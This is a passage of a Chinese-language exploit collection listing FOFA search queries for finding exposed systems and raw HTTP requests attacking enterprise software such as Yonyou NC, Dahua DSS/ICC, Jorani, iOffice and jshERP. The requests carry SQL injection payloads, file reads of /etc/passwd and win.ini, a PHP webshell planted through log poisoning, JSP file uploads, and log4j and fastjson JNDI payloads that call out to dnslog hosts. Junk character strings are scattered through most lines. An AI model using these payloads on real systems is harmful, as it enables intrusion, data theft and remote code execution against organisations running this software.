FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
7 M/ J$ k3 ?( Q  w% j! wGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
- y* g2 ]& Q! r0 g( gHost: 127.0.0.1
! U( `2 [% ]. f+ Q+ p% R8 \Pragma: no-cache
6 [- l2 ?: y5 H+ c. X6 B  |Cache-Control: no-cache
5 x' y# y5 C( z* E( W$ V. \/ aUpgrade-Insecure-Requests: 13 G+ o; A/ X+ M. j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: {' a( z6 F$ c3 j2 X, v- z: `, \/ p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 {+ B, f1 a/ F9 JAccept-Encoding: gzip, deflate! X9 Q( Z6 G$ a
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8. A, W) N2 V% `4 f4 l
Connection: close. }  `/ y6 i7 P- }0 D- a
. u+ @  D5 e/ K  d

, h- x1 R0 Q$ w4 I  a" m6 d12. Jorani < 1.0.2 远程命令执行' k: @, E1 r1 ?8 O
FOFA:title="Jorani", x6 Z9 |6 N) M
第一步先拿到cookie; g8 B4 E% \% F& b, |, |
GET /session/login HTTP/1.1. K8 t8 |9 t1 }0 ?
Host: 192.168.190.304 ?2 e& ]' w, F7 V$ u
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
, ~: w# P9 S, y' NConnection: close
. D& ^1 a7 e9 e2 `Accept-Encoding: gzip+ W4 y7 o5 x5 [) ]) V& |" T5 e! k
3 w7 O- \. F8 O; |5 B2 C  Y" z
( e5 v4 F- F6 m! M  N
响应中csrf_cookie_jorani用于后续请求
0 d- [4 S- v5 l3 P* tHTTP/1.1 200 OK
3 |' b4 V7 m0 h5 e7 D9 P+ ^7 YConnection: close
5 l- N9 u% V) |* DCache-Control: no-store, no-cache, must-revalidate/ Q" i4 q8 l  j
Content-Type: text/html; charset=UTF-8
  |1 B' w+ w2 R* \+ ZDate: Tue, 24 Oct 2023 09:34:28 GMT7 y1 J" r2 }& U* n3 Z) i
Expires: Thu, 19 Nov 1981 08:52:00 GMT  i2 o1 P. d9 o- C2 l  I( B
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
! R6 w, ]% Z& B" N; RPragma: no-cache
2 A" O" k$ j0 c" r1 x# qServer: Apache/2.4.54 (Debian)
' I* c% b& ]0 tSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
1 Y/ r1 y# k4 k% z0 HSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly: {1 D! H/ v/ f+ y+ a, ^- |
Vary: Accept-Encoding9 m5 k& a. D+ v" _% F9 m% ~
$ q. c3 j; N( Y2 \, Z/ P
1 c3 t9 C/ g% y7 o/ ]9 J5 j
POST请求,执行函数并进行base64编码7 a' @2 m6 F: N- @
POST /session/login HTTP/1.1! V. c5 `# B" Y* J+ P8 g  l  |, y
Host: 192.168.190.30% z5 H" |7 C5 ]1 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
; n' K; `0 R6 R, oConnection: close
( h4 m& D3 S+ S! C' y8 FContent-Length: 252* U% z, d2 J( \) E$ O! n; C7 `
Content-Type: application/x-www-form-urlencoded
( s$ m) C& t. o4 eCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
' f0 z$ T: R4 F% zAccept-Encoding: gzip* Z) H* d8 ^; U, L2 M

! B5 H- U4 V* n" p$ H1 ~5 x' Y# Xcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor, |$ g: D5 i1 `: h
" T3 L/ x4 a' k
. b# \+ T, Q( t# c
' R/ o  R8 ]$ B
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
4 P* Z# x6 c; IGET /pages/view/log-2023-10-24 HTTP/1.19 L# z* C, x0 m! k5 k
Host: 192.168.190.30
5 W2 v3 t: ?# W0 [/ }. kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, n$ ]1 W5 H/ i* i
Connection: close
5 n, u: A2 M: G4 G7 J( UCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
. j" P7 n! b9 B: a# o  O7 [2 hK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
9 X  [' I+ z+ `; r* a& V0 aX-REQUESTED-WITH: XMLHttpRequest
2 u/ v; j+ k' S0 g( jAccept-Encoding: gzip
, n% t6 C( O  u6 b4 ~1 ~. c* @9 h: i' @, X

% g7 E1 _7 F/ K4 N6 o1 L. I; q& X13. 红帆iOffice ioFileDown任意文件读取9 P3 ]" @3 h' V* a- R
FOFA:app="红帆-ioffice"
/ W% Q& t7 g, w" K$ F0 G6 B" kGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
( i# s' Y/ ~5 S  ]/ M# }& l/ kHost: x.x.x.x0 H. u$ q4 N1 @
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
$ A5 T& H8 P% KConnection: close( z2 o. m; j  Z. [. G& ~+ r
Accept: */*  t) l7 W  q& f, z
Accept-Encoding: gzip6 K# A( d. `7 O/ f
( E0 A: C. B" m3 ]4 m# e% ^$ i

  A1 A3 v3 ]1 M# {, s14. 华夏ERP(jshERP)敏感信息泄露
% k9 m- o& {8 u% b/ P4 IFOFA:body="jshERP-boot". c6 r; ]6 O. u% Y2 |% G7 K1 C
泄露内容包括用户名密码* J. A# v6 l0 `- C  `) p' [; D/ l
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
2 I: |0 @; {7 W' T4 c/ ?Host: x.x.x.x8 o* T- O8 O0 {4 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36- o" h9 f1 L: a! s9 g
Connection: close
( E( G- r% g7 f3 ^) ]/ d' pAccept: */*# [" T2 ?! b( }% L# v
Accept-Language: en
& f4 z6 u& R/ ?+ d( pAccept-Encoding: gzip
9 i; b( Z# r+ l( L! B
+ [0 m) ]3 f5 p* n. [8 A+ _7 {4 J5 G: t3 s1 [2 L0 ?
15. 华夏ERP getAllList信息泄露
. ^3 e+ U# {- h6 U4 w/ @  TCVE-2024-0490
' z( J$ w& O+ F2 R5 p, pFOFA:body="jshERP-boot"' c! Y" v8 |' W- v( z+ Q' c* |, k
泄露内容包括用户名密码4 A7 m4 z' H4 Y  W4 x
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
2 T* q4 Q! _* l) t! Y6 L9 V6 iHost: 192.168.40.130:100; Y3 }; a& [3 u* k! Z$ P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.361 d* n+ Y9 r! ?+ B4 M* T* q- A4 p  T; H
Connection: close" h" A& }8 m4 c/ j+ H
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
% h2 j2 z) e' l7 S. XAccept-Language: en' Q+ }$ {7 t# a9 u
sec-ch-ua-platform: Windows/ h' g! ~: t; t+ M% A6 K0 M$ m" b1 F
Accept-Encoding: gzip
  k& h1 C8 O4 |6 m5 C7 {( R8 N) n
' q8 A" \' h0 \# L8 s
16.  红帆HFOffice医微云SQL注入
% i1 M3 j) U  P/ S7 i! M! y' DFOFA:title="HFOffice"
; K! u- ^: D* g6 M7 vpoc中调用函数计算1234的md5值' ?% m! e9 @& d' ^0 O3 [
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
: c9 g, ]% o6 r5 X5 z: JHost: x.x.x.x
/ T/ A3 O$ \7 ]- |) _User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
0 Q5 P. `4 n( b* O* NConnection: close2 ^5 D# D/ M8 m: n* p
Accept: */** y! c  ]8 W# L$ O0 a) ^$ f
Accept-Language: en
) V" ]) H, m. a- h" A" E) h% eAccept-Encoding: gzip$ _; g/ K' u: I; q
0 X0 R/ h! w0 w, R, A3 U1 M8 r

  b+ X; D- Z% E' T- O' g# n! z7 |17. 大华 DSS itcBulletin SQL 注入+ L. I( }# c" s/ Y$ f- x4 }
FOFA:app="dahua-DSS"
$ r& X+ U1 q/ Q' g% p/ R2 ~2 pPOST /portal/services/itcBulletin?wsdl HTTP/1.1
8 U/ ?( |6 Y" y0 x" v4 ?. \3 A4 EHost: x.x.x.x
5 P7 Z% c& W2 u; j2 u$ MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- z; p; M8 T$ N' Y* @; U! Y9 A: z
Connection: close
7 G( m- i9 k% A# P& B+ ^% f) t. u% zContent-Length: 3453 i  h  p0 f$ n& ~# B4 u; `' q
Accept-Encoding: gzip; o; b( g2 h5 E- F  |0 r7 U& Q
# W, [! F( B, w$ x+ F- Z5 b) B
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
, O5 ]. T2 ^4 f) u/ z. C. Y<s11:Body>
  q5 C7 @5 n6 S; K, S; `/ u  ?8 G    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
  g+ A! S* C& o8 A0 c1 q! h      <netMarkings>
5 O2 H7 Q4 \# V! M) Q/ f       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=14 q% W. j7 m3 l/ q* v, g
      </netMarkings>- m/ R0 o: i  I/ H3 T/ C
    </ns1:deleteBulletin>: D# u( F( Z9 L5 H6 J
  </s11:Body>
1 @) C2 W; t2 a# Q</s11:Envelope>
5 a! Y* P) ]; P% Z; r' E4 e" M' S$ X9 [$ ^& d

4 F" A" H9 r+ r# [; C18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
" ^0 U: t+ n+ eFOFA:app="dahua-DSS"% W9 J, [7 C8 S2 u" H) z+ s; ?
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
! W" R, J  a1 G8 F' AHost: your-ip' Q( v+ D$ k/ x. e2 J: `" N/ w& K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! E& V9 n0 Z; l; v& Y8 L% QAccept-Encoding: gzip, deflate! I. B6 W) l: P, z; X# d, D$ u
Accept: */*( y7 R2 |0 x. }0 ?2 o
Connection: keep-alive) w; ^- ?9 j- N( L' p
* e* o0 Y0 [) C4 J* e3 a& F

+ x* a) W) X& T" b# h
, e# l# e' D! t! i# d, b19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入. f7 A0 ?8 S0 K2 H' a, }  `
FOFA:app="dahua-DSS"
9 v1 w2 {- [$ e& A: y0 a& n" N5 a' XGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.15 j) M/ e/ n) I; @
Host:1 |" z, f: m- G0 y" U' A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- p% t1 V# F, q# B) R4 W0 DAccept-Encoding: gzip, deflate" k2 {8 p+ W8 V$ X) w5 F+ e
Accept: */*
  ~# k% X. v& dConnection: keep-alive
) D8 u) U! G, H1 x& }9 m/ f/ G% j
+ w, V3 L2 x8 }
; H1 ]& m% W1 s2 f" A- Z8 J20. 大华ICC智能物联综合管理平台任意文件读取
+ Y! i9 c4 r. q0 j/ I* HFOFA:body="*客户端会小于800*"
8 {$ b: R0 k5 gGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.14 h. f- x4 r! |0 N8 U7 V$ F% v* t
Host: x.x.x.x. ]5 l4 ?  \, M, |% L# G9 g, K
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# L( d2 A3 ?. u& P$ ^1 F: F9 PConnection: close# \! {# n. ^+ l( ?5 P
Accept: */*
0 w  w5 C' v0 f4 |/ v; h& t7 xAccept-Language: en
  K' z5 i$ c6 RAccept-Encoding: gzip
7 g9 l4 ~9 k+ f- s
9 V: B+ W, G; n$ h# M* C9 ^0 @  J! [  |
21. 大华ICC智能物联综合管理平台random远程代码执行
  e0 V# i% o8 n' ]9 v5 o. V3 EFOFA:icon_hash="-1935899595"
7 P) U4 V6 E' e5 L! S1 sPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
, j9 L. P6 T. ~( N7 aHost: x.x.x.x
1 k2 U# t, A0 G6 L0 \/ h0 gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 e! I! G  k6 d& I" P
Content-Length: 161
2 C( [$ I! s: e5 y; DAccept-Encoding: gzip6 e3 p% |" ~) C) S
Connection: close  l2 K4 ]' t3 M# o! D# f
Content-Type: application/json;charset=utf-8) |1 t% Z" b- u, D

* p9 H0 k; Z0 T{
8 p, A9 v, ]6 m. `4 [# n4 _% E"a":{2 c. t  d) e% o
   "@type":"com.alibaba.fastjson.JSONObject",
, X: X" E& c  C, _    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
# h& I: |4 {0 I/ @" C3 S# z  }""
& q& [2 T7 X/ R) k  F}
9 o" A( @4 @) _% H3 E
, \8 }# |7 D; N# }$ \+ r8 ?$ x+ V! _0 ~" z& v: r( ]# |
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
$ b3 T" x* U5 R3 t) Q1 s, iFOFA:icon_hash="-1935899595"' v  S) g1 N0 U0 H- y
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.17 R/ _) ]$ I2 C# F* }" C  |" z
Host: your-ip
. P# i* Y9 P0 Q6 w! S( W; SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: ^9 a# x/ l# cContent-Type: application/json;charset=utf-8' U6 ~1 z# R9 z( [' D4 C
3 ]9 J+ s5 b1 }- E
{
0 m$ v* q1 G" c& E8 x- Z( C"loginName":"${jndi:ldap://dnslog}"
" A% r0 v/ d* y) m7 w}
! b; q4 f  B8 X& V; Q, F% l. `" O9 \9 E: X! ^9 ~- ]  q+ B6 \! w
& r. P+ u/ e, N* m: v* S* \

- h' S% m7 V$ j7 K) ~6 X. g* y23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
- }# ~2 R! T7 \/ ]" H& j& @7 BFOFA:icon_hash="-1935899595"2 r) J  k2 W9 \/ F/ ?& \! O. ]
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1" K5 j( ?: Q' Y  j1 q1 ]  t
Host: your-ip- f$ ^9 y7 i5 R$ ~9 m7 R3 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ M+ h$ [6 f9 U* r
Content-Type: application/json;charset=utf-8" `; v  k! m. b1 {; ?8 Z  u
Accept-Encoding: gzip
; x' X8 [" z: _! z! s1 G0 ?0 @Connection: close: {/ a7 H( [9 y8 m: G

' j! E$ h9 j' J" o6 x{
) l$ i5 N" s' T4 E    "a":{* M+ Q  F9 A3 b, S) y  [" b  }& J. X
        "@type":"com.alibaba.fastjson.JSONObject",- l+ ^" c1 e3 t
       {"@type":"java.net.URL","val":"http://DNSLOG"}% D! P) P9 ?7 f
        }""
& {8 l9 I& F- ~8 [5 Y& W}
, P: P* C8 k- L4 b8 Z" M
" y! t$ q% J: ^0 I8 K! v# U+ V2 O9 j. V  e! a
24. 用友NC 6.5 accept.jsp任意文件上传
2 N5 S3 o$ o- ^8 QFOFA:icon_hash="1085941792"
; }( i) m' v: x4 `/ BPOST /aim/equipmap/accept.jsp HTTP/1.1( A1 r& j) ^2 L$ l3 Y( t+ \
Host: x.x.x.x$ r& U6 _( y6 f! z% Q$ J7 Q
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36! C& v' y3 g( y
Connection: close0 i6 x/ x% ]. s) E# E4 P. L
Content-Length: 449
. i) N4 O% R& b/ FAccept: */*: n' D* T0 Y8 d# e$ L) J: H
Accept-Encoding: gzip8 b& j2 ~* N8 d0 s8 a5 P  @1 D
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc& a( m# a* n5 X/ o: {( d6 L: _) [: W
' _. A# M, o3 b
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
/ y5 E* t- y& r' ]2 G! DContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"' n8 Y6 e" }  E% A
Content-Type: text/plain
$ z7 p# D1 C8 }( f* Y
: M, }4 d' l; e4 k; S# s' a<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>! i5 @6 p+ \% R6 {
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc" E9 \$ H0 _; I5 w8 p
Content-Disposition: form-data; name="fname": L: Q% Q& g% G

& K) n8 F3 x6 R) S4 @3 h' K\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp- G* w$ [1 O9 _+ A* y3 w
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--: e* {( B. y* x8 M5 g% u3 Y: f1 Q0 l

/ r: ^7 I4 H0 G0 o: L
, S0 k" i1 f* }1 t1 ^9 j* s. I25. 用友NC registerServlet JNDI 远程代码执行- j5 ?5 \8 `6 l% p2 q% Q  e  b
FOFA:app="用友-UFIDA-NC", q, s6 o9 ^2 \8 v
POST /portal/registerServlet HTTP/1.1
3 r; Y) M. w" }' u- zHost: your-ip$ v' n! R( P. s! ]7 i: O* u8 }* f8 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
3 E1 I/ `' v! w. j7 k) Q7 M* K9 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.96 q3 y0 |' G8 }9 ~
Accept-Encoding: gzip, deflate
; Z  a. [3 a& r0 N* PAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
6 i+ x. E' M* S% i' G$ VContent-Type: application/x-www-form-urlencoded2 B% \! Z- l6 ]
2 ]. H# K+ T, |+ K: g
type=1&dsname=ldap://dnslog2 C& ?; h7 j# i2 P- F; a; k

& ?2 I3 W, \) r2 h! F4 [+ h/ ]) o4 P* ~. e2 ]# Q- t; {

7 E5 i  O# A7 S4 M* d26. 用友NC linkVoucher SQL注入
- H8 O% P9 f$ D# O" C- X! w2 G9 PFOFA:app="用友-UFIDA-NC"0 I, _  C& M1 w2 X  U
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) l$ P8 O' k7 HHost: your-ip' O* m( S' @6 u# D  c! M% R& k8 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. w+ _% M+ ^2 [3 z
Content-Type: application/x-www-form-urlencoded- m5 _% H: t) N" v' Y0 V
Accept-Encoding: gzip, deflate4 `- J" D/ A4 Y5 i+ X
Accept: */*
7 l6 N1 d: K$ `2 {! W# b3 K( J5 TConnection: keep-alive' o% a. [8 Y3 ]+ A/ H
6 O! |" q+ K0 O/ S/ G& @7 T
) _; m2 t$ g8 F& I& ?7 o7 e8 Y
27. 用友 NC showcontent SQL注入
) _7 N3 H' L6 p4 b, qFOFA:icon_hash="1085941792"( K6 M" o( n- m. E# w$ B# r% y
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
# k1 {4 v) ]' @  Z' X: `Host: your-ip
# O; R, W# U! k& J3 z1 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 H& ]5 ]' n; AAccept-Encoding: identity
5 i3 [1 X+ K3 S5 \% o! x! z3 e9 `Connection: close
/ p& T: F9 G2 ^2 Z! g8 r2 f7 D  kContent-Type: text/xml; charset=utf-8
0 V# h) i3 G9 M, t4 u- u% G
/ A& t: W! \) z9 e" n/ B8 U% _! v/ a
28. 用友NC grouptemplet 任意文件上传
9 y" D2 u, Q' X: o( G" \; xFOFA:icon_hash="1085941792"1 t& r) D6 q: A  b: C
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.12 u; m3 `8 }0 w2 X; f$ ?) c4 K" t
Host: x.x.x.x
; ~; X4 E( J/ _8 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36& J7 D6 e, S' F& I/ u
Connection: close
. T; V& S5 N) kContent-Length: 2682 w& S* x. h4 t) ^
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk# f: G0 j* M& o* Z* c3 U
Accept-Encoding: gzip7 }9 d$ a  I; |4 l  [* i
1 b# v6 H5 k7 d7 G
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
! q% U- D0 h( ~. DContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp", I% b" z0 k" i3 f
Content-Type: application/octet-stream; K0 M* D, a8 e- W

# B( `8 H! B# S- ^/ A<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
# I6 E/ U& V% O0 D$ D. M------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--( a% O# o/ d2 i' `& r4 u
  C5 Y* v$ }( f- d7 w
9 Y, b. `7 a$ V$ O5 j% Q- O
/uapim/static/pages/nc/head.jsp
' P& M7 w& U) q2 w
7 Y2 d5 i" Q+ x29. 用友NC down/bill SQL注入0 j( @2 d8 b8 B: t5 `
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
0 {1 g# t8 v% V- UGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1: g; c" u' E2 u7 ^3 g" A
Host: your-ip
1 S8 e6 \, @  _  f8 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 r% {' v+ J2 |1 X+ p
Content-Type: application/x-www-form-urlencoded/ }: u; f; D  M: X7 u6 \) r
Accept-Encoding: gzip, deflate
3 {3 v7 Q. a# d5 A8 ^: C- G( OAccept: */*
; h# {0 w& B: M5 O% T/ F+ v5 g' lConnection: keep-alive3 K5 n' n" j% Z! K/ y! q  X1 S1 V

% l. E# {3 U, p( L
2 F4 h$ S7 D  q. u30. 用友NC importPml SQL注入
3 C) H' p- J4 z3 }* rFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- `7 ^* \! u" T% w8 lPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
4 w) E5 C, O+ h' q5 b3 vHost: your-ip9 p1 c6 N& R" z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
/ Y& k1 c, k% L: V8 C* i4 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
% N3 \3 u& J* i8 [" _Connection: close7 c! A5 t" A" {3 r

% _3 d# C7 U! M7 T) R------WebKitFormBoundaryH970hbttBhoCyj9V
: E1 |9 Y1 \3 x) l9 S' k$ F- _& f5 {Content-Disposition: form-data; name="Filedata"; filename="1.jpg"  M. R8 u+ e( [' e4 i
Content-Type: image/jpeg1 @. V+ e( x6 d3 J% [( {1 S
------WebKitFormBoundaryH970hbttBhoCyj9V--
7 Y# L( H3 A7 ^
7 z9 K3 l2 i/ U+ g
2 L. i& [0 p( q$ C2 G$ T' R3 P; Y31. 用友NC runStateServlet SQL注入4 L! N* L- N: L4 J8 u; [
version<=6.5
  h3 r, A  B& QFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
8 S3 s8 D& t$ oGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
4 d6 o% Y7 Q, {Host: host
6 }& j- Z$ ]) i0 u5 q) j" H# HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
' A, T, a& O9 Z) z7 N( H5 rContent-Type: application/x-www-form-urlencoded; B# n9 S4 s  `: U- ^: u( @

4 F( Y" S* j, @: l5 r8 Q
+ ^8 \6 h9 x* {7 ~" t6 Y- `32. 用友NC complainbilldetail SQL注入' @. r  o8 J" I+ G
version= NC633、NC65
" `, t5 P  Q" ZFOFA:app="用友-UFIDA-NC"
$ Z+ s5 D' a" a) j2 KGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) a7 k1 P1 P: _7 z% j6 i- n1 @1 j- GHost: your-ip
) `7 A* q9 |. {: ]- a6 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 d; Y8 T7 h5 s. n0 E
Content-Type: application/x-www-form-urlencoded9 u/ L" T9 K  q
Accept-Encoding: gzip, deflate
  g. t6 v* m  Q) {# W& e1 TAccept: */*6 G; n1 i" ]1 U7 ?; S0 r
Connection: keep-alive) ~. c" s( \. I2 u7 N" R

4 `" f% c( C4 Q7 Q
. i; Y8 [# K& L% ^! n$ b. \" y33. 用友NC downTax/download SQL注入
5 x' B( {8 m$ d" s0 y% x$ ^version:NC6.5FOFA:app="用友-UFIDA-NC"
5 W6 r1 y9 U7 B# v1 j# xGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 f, M! x# ?. X& o8 I7 c1 y( @Host: your-ip# ~8 d- n' g' S/ g! a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 b+ ?  Y* L  o, f+ Y) WContent-Type: application/x-www-form-urlencoded/ ~+ d/ M& s+ x" D' ^/ k: {$ H
Accept-Encoding: gzip, deflate
; a0 e7 C( {2 `' iAccept: */*4 y0 P" \5 E' k  b' ~
Connection: keep-alive9 X  `# l( e8 f# r' t
! `% F- ]3 Z# U& e& M1 ]
, [% a& D) c5 Q) K# O
34. 用友NC warningDetailInfo接口SQL注入
" p. x5 e0 g5 N- Q5 c+ F% sFOFA:app="用友-UFIDA-NC"
( W$ B2 _- h. t- f) H8 L( |  N) lGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ ]) D* q4 [3 p3 C; C/ vHost: your-ip
; c$ j0 F; f8 k6 T8 w5 O- UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ d- E& G. f! ?5 v8 IContent-Type: application/x-www-form-urlencoded
; m6 d4 w5 i) Z7 cAccept-Encoding: gzip, deflate! \( `% R6 q" M, K7 Y" R, b
Accept: */*3 ?$ x+ C+ n# _0 H/ H
